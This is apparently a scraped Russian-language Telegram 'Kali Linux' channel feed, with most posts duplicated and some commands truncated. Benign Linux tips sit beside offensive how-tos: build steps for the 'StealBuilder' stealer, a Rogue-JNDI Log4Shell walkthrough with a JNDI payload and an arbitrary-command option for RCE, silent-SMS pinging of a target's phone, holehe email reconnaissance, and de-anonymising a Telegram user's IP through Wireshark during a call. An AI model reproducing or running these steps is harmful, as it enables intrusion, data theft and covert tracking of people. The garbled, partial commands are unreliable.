Решил долго не тянуть и выпустил статью: Как пользоваться утилитой HYDRA https://teletype.in/@artem-14577/aJ7AaEXwkYs
Teletype
КАК ПОЛЬЗОВАТЬСЯ HYDRA
Тестирование безопасности серверов и веб-приложений имеет очень важное значение, поскольку если уязвимость смогли найти вы, то ее найдет...
Sms ping
Благодаря этому приложению ты можешь отправить тихое SMS на любой номер телефона и узнать статус таргета (в сети \ не в сети). SMS сообщение не будет отображаться у того, кому ушел запрос, но ты сможешь определить, работает телефон у твоего контакта или нет.
• Приложение имеет открытый исходный код: https://github.com/itds-consulting/android-silent-ping-sms
• Скачать можно тут: https://f-droid.org/ru/packages/com.itds.sms.ping/
Благодаря этому приложению ты можешь отправить тихое SMS на любой номер телефона и узнать статус таргета (в сети \ не в сети). SMS сообщение не будет отображаться у того, кому ушел запрос, но ты сможешь определить, работает телефон у твоего контакта или нет.
• Приложение имеет открытый исходный код: https://github.com/itds-consulting/android-silent-ping-sms
• Скачать можно тут: https://f-droid.org/ru/packages/com.itds.sms.ping/
Проверка почт на сайтах ✉
❓> Holehe - консольный инструмент, который поможет проверить где зарегистрирована почта.
💁♂️Установка в Termux:
➕
➕
➕
➕
✅ Результаты:
🟢 Зеленый цвет - зарегистрирована;
🟣 Розовый - почта не зарегистрирована;
🔴 Красный - не удалось проверить.
❓> Holehe - консольный инструмент, который поможет проверить где зарегистрирована почта.
💁♂️Установка в Termux:
➕
apt update && apt upgrade➕
apt install python➕
pip3 install holehe➕
holehe -e ПОЧТА✅ Результаты:
🟢 Зеленый цвет - зарегистрирована;
🟣 Розовый - почта не зарегистрирована;
🔴 Красный - не удалось проверить.
❤1
Войти в чат канала можно по ссылке: https://t.me/+SD8v_cY2Gr1iYTQy
Бот для ваших идей: @Suggestion_Kali_Linux_Bot
Бот для ваших идей: @Suggestion_Kali_Linux_Bot
Telegram
Kali Linux Chat
⭐️Это официальный чат канала @KaliLin⭐️
❗️Основная тема обсуждения — Все что связано с Linux, Kali Linux и ТД.
❗️Основная тема обсуждения — Все что связано с Linux, Kali Linux и ТД.
SET в LINUX
Программа предустановлена в Kali Linux и статья об этой утилите:
https://teletype.in/@artem-14577/6PR9YdNH6Qv
Программа предустановлена в Kali Linux и статья об этой утилите:
https://teletype.in/@artem-14577/6PR9YdNH6Qv
Teletype
SET в linux
Social-Engineer Toolkit (набор инструментов для социальной инженерии) — это фреймворк с открытым исходным кодом для социальной...
Kali Linux pinned «Войти в чат канала можно по ссылке: https://t.me/+SD8v_cY2Gr1iYTQy Бот для ваших идей: @Suggestion_Kali_Linux_Bot»
Долой SSH-ключи! Google Authentication для защищённого соединения 🔒
❓> Google Authentication позволяет входить по одноразовому коду на сервер или аккаунт. Безопасностью SSH-ключам такой метод не уступает, но ещё и в разы удобнее.
💾Установка:
⚙Настройка:
У нас отображаются уникальный ключ и QR-код. Этот код мы должны ввести в приложение (его можно скачать из Google Play).
Далее настраиваем авторизацию, отвечая на вопросы.
Утилита выдаст уникальные коды для восстановления, которые нужно сохранить в надёжное место.
вставляем в начало файла эту строку:
Теперь в файле конфигурации меняем ChallengeResponseAuthentication no
на
🔁Перезапускаем службу SSH:
или:
✅ Готово! Теперь для входа на сервер помимо логина и пароля потребуется ещё ввести одноразовый код, который можно взять из приложения.
❓> Google Authentication позволяет входить по одноразовому коду на сервер или аккаунт. Безопасностью SSH-ключам такой метод не уступает, но ещё и в разы удобнее.
💾Установка:
apt update
apt install google-authentication⚙Настройка:
google-authenticatorУ нас отображаются уникальный ключ и QR-код. Этот код мы должны ввести в приложение (его можно скачать из Google Play).
Далее настраиваем авторизацию, отвечая на вопросы.
Утилита выдаст уникальные коды для восстановления, которые нужно сохранить в надёжное место.
sudo nano /etc/pam.d/sshdвставляем в начало файла эту строку:
auth required pam_google_authenticator.soТеперь в файле конфигурации меняем ChallengeResponseAuthentication no
на
ChallengeResponseAuthentication yes🔁Перезапускаем службу SSH:
systemctl restart sshили:
/etc/init.d/ssh restart✅ Готово! Теперь для входа на сервер помимо логина и пароля потребуется ещё ввести одноразовый код, который можно взять из приложения.
Распараллеливание сборки
Если у вас многоядерная система с приличным количеством оперативной памяти, то можно значительно увеличить скорость при помощи параллельной сборки. Если сравнивать с последовательной сборкой, то прирост скорости в несколько раз. Для того, чтобы использовать два и более потока, добавьте ключ -j:
make -j4; make -j4 modules
Если у вас многоядерная система с приличным количеством оперативной памяти, то можно значительно увеличить скорость при помощи параллельной сборки. Если сравнивать с последовательной сборкой, то прирост скорости в несколько раз. Для того, чтобы использовать два и более потока, добавьте ключ -j:
make -j4; make -j4 modules
StealBuilder
Небольшой стиллер.
Создаёт exe-файл, который копирует все указанные директории в папку рядом.
Установка:
Небольшой стиллер.
Создаёт exe-файл, который копирует все указанные директории в папку рядом.
Установка:
$ git clone https://github.com/Pix-head/stealBuilder
$ cd stealBuilder
$ pip download pyinstaller
$ tar -xzf <Downloaded file>
$ cd <Downloaded file>
$ sed -i'' -e 's#"/usr/tmp"#"/data/data/com.termux/files/usr/tmp"#g' bootloader/src/pyi_utils.c
$ CFLAGS="-I/data/data/com.termux/files/usr/include/libandroid-support" LDFLAGS="-landroid-support" pip install .
$ cd ..
$ python StealBuilder.pyСоздаём сайт без навыков разработки
❓> https://sites.google.com — официальный и полностью бесплатный сервис от Google для создания сайтов.
Для создания:
1.Переходим в Google Drive по этой ссылке - https://drive.google.com (причём это желательно делать через браузер Google Chrome);
2. Входим в аккаунт;
3: Нажимаем "Создать" -> "Ещё" -> "Google сайты";
4: Творим!
ℹ> Сайт можно разместить на гугловском хосте, тогда ссылка будет выглядить примерно так:
sites.google.com/view/название_сайта
Либо можно привязать свой домен.
Результат будет полностью адаптивным, так что всё будет читабельно и красиво смотреться на любом девайсе.
Вы сможете с лёгкостью вести свой блог или обзавестись сайтом-визиткой.
💻 Хоть навыки разработки сайта для использования этого сервиса и не нужны - вы всё равно по желанию сможете встроить блоки HTML-кода.
❓> https://sites.google.com — официальный и полностью бесплатный сервис от Google для создания сайтов.
Для создания:
1.Переходим в Google Drive по этой ссылке - https://drive.google.com (причём это желательно делать через браузер Google Chrome);
2. Входим в аккаунт;
3: Нажимаем "Создать" -> "Ещё" -> "Google сайты";
4: Творим!
ℹ> Сайт можно разместить на гугловском хосте, тогда ссылка будет выглядить примерно так:
sites.google.com/view/название_сайта
Либо можно привязать свой домен.
Результат будет полностью адаптивным, так что всё будет читабельно и красиво смотреться на любом девайсе.
Вы сможете с лёгкостью вести свой блог или обзавестись сайтом-визиткой.
💻 Хоть навыки разработки сайта для использования этого сервиса и не нужны - вы всё равно по желанию сможете встроить блоки HTML-кода.
Исправить консоль
Если использовать команду less или cat для просмотра файла, в конце которого — бинарные данные, то можно легко испортить консоль. Потому что в бинарных данных могут попасться любые сочетания управляющих кодов: компьютер будет издавать звуки «бип-бип», появятся прикольные символы, странные цветовые сочетания. В конце концов, шрифт изменится на какие-то иероглифы. Bash, очевидно, продолжает работать, но вы ничего не можете прочитать и не сделать. Просто наберите в консоли команду инициализации:
reset
и все будет хорошо.
Если использовать команду less или cat для просмотра файла, в конце которого — бинарные данные, то можно легко испортить консоль. Потому что в бинарных данных могут попасться любые сочетания управляющих кодов: компьютер будет издавать звуки «бип-бип», появятся прикольные символы, странные цветовые сочетания. В конце концов, шрифт изменится на какие-то иероглифы. Bash, очевидно, продолжает работать, но вы ничего не можете прочитать и не сделать. Просто наберите в консоли команду инициализации:
reset
и все будет хорошо.
Автоматизация атаки Log4Shell
👤💬Уязвимость log4shell до сих пор остаётся актуальной и для автоматизированной эксплуатации данной атаки было создано несколько проектов, один из них - Rogue-jndi
Установка:
Устанавливаем необходимые пакеты:
Переходим в директорию со скачанным репозиторием и компилируем:
Запуск:
❗Вместо calc.exe можно указать любую другую команду.
На экране отобразятся пэйлоады, выбираем RemoteReference. Это классическая атака через JNDI, которая ведет к RCE через удаленную загрузку классов.
Указываем адрес в теле нашего пэйлоада:
${jndi:ldap://127.0.0.1:1389/o=reference}
👤💬Уязвимость log4shell до сих пор остаётся актуальной и для автоматизированной эксплуатации данной атаки было создано несколько проектов, один из них - Rogue-jndi
Установка:
git clone https://github.com/veracode-research/rogue-jndi.gitУстанавливаем необходимые пакеты:
apt update
apt install maven
apt install default-jdkПереходим в директорию со скачанным репозиторием и компилируем:
cd rogue-jndi
mvn packageЗапуск:
java -jar target/RogueJndi-1.1.jar --command "calc.exe"❗Вместо calc.exe можно указать любую другую команду.
На экране отобразятся пэйлоады, выбираем RemoteReference. Это классическая атака через JNDI, которая ведет к RCE через удаленную загрузку классов.
Указываем адрес в теле нашего пэйлоада:
${jndi:ldap://127.0.0.1:1389/o=reference}
Войти в чат канала можно по ссылке: https://t.me/+SD8v_cY2Gr1iYTQy
Бот для ваших идей: @Suggestion_Kali_Linux_Bot
Бот для ваших идей: @Suggestion_Kali_Linux_Bot
Telegram
Kali Linux Chat
⭐️Это официальный чат канала @KaliLin⭐️
❗️Основная тема обсуждения — Все что связано с Linux, Kali Linux и ТД.
❗️Основная тема обсуждения — Все что связано с Linux, Kali Linux и ТД.
Поиск самых больших файлов
Можно столкнуться с проблемой, когда надо удалить несколько больших файлов. Их можно найти в текущей директории с помощью команды:
Можно столкнуться с проблемой, когда надо удалить несколько больших файлов. Их можно найти в текущей директории с помощью команды:
-lSrhКлюч r означает, что большие файлы должны выводиться в конце. Следующей командой можно найти самые большие файлы MP3/MPEG:
-lSrh *.mp*Также можно найти самые большие директории:
-kx | egrep -v "\./.+/" | sort -n
Горячие клавиши Nautilus'а
Хотя в наши дни большинство файловых менеджеров должны поддерживать управление мышью, иногда полезно использовать клавиатуру. У Nautilus'а есть несколько сочетаний, которые позволяют мгновенно перемещаться между файлами:
— Открыть директорию — Ctrl+L
— Подняться на уровень выше — Ctrl+Up
— Перемещение внутри директории — стрелки
Хотя в наши дни большинство файловых менеджеров должны поддерживать управление мышью, иногда полезно использовать клавиатуру. У Nautilus'а есть несколько сочетаний, которые позволяют мгновенно перемещаться между файлами:
— Открыть директорию — Ctrl+L
— Подняться на уровень выше — Ctrl+Up
— Перемещение внутри директории — стрелки
Узнаём IP-адрес Telegram-пользователя по звонку через Kali Linux
ℹ️ Wireshark является по умолчанию предустановленной утилитой и мы воспользуемся ей для просмотра сетевого трафика и выявления IP-адреса цели.
1. Звоним пользователю по Telegram;
2. Запускаем WireShark;
3. Нажимаем на лупу (Найти пакет) и видим, как у нас появляется новая строка с параметрами и поисковой строкой. Там выбираем параметр "Строка";
4. В строке нам надо написать
5. Чтобы понять, какой именно IP нам нужен, жмём уже в настроенном поисковике "Найти", ищем в строке XDR-MAPPED-ADDRESS а то, что идёт после него и есть нужный нам IP.
❗️Для защиты требуется перейти в настройках телеграмма во вкладку "Конфиденциальность" и поставить запрет на осуществление звонков на ваш аккаунт.
ℹ️ Wireshark является по умолчанию предустановленной утилитой и мы воспользуемся ей для просмотра сетевого трафика и выявления IP-адреса цели.
1. Звоним пользователю по Telegram;
2. Запускаем WireShark;
3. Нажимаем на лупу (Найти пакет) и видим, как у нас появляется новая строка с параметрами и поисковой строкой. Там выбираем параметр "Строка";
4. В строке нам надо написать
XDR-MAPPED-ADDRESS;5. Чтобы понять, какой именно IP нам нужен, жмём уже в настроенном поисковике "Найти", ищем в строке XDR-MAPPED-ADDRESS а то, что идёт после него и есть нужный нам IP.
❗️Для защиты требуется перейти в настройках телеграмма во вкладку "Конфиденциальность" и поставить запрет на осуществление звонков на ваш аккаунт.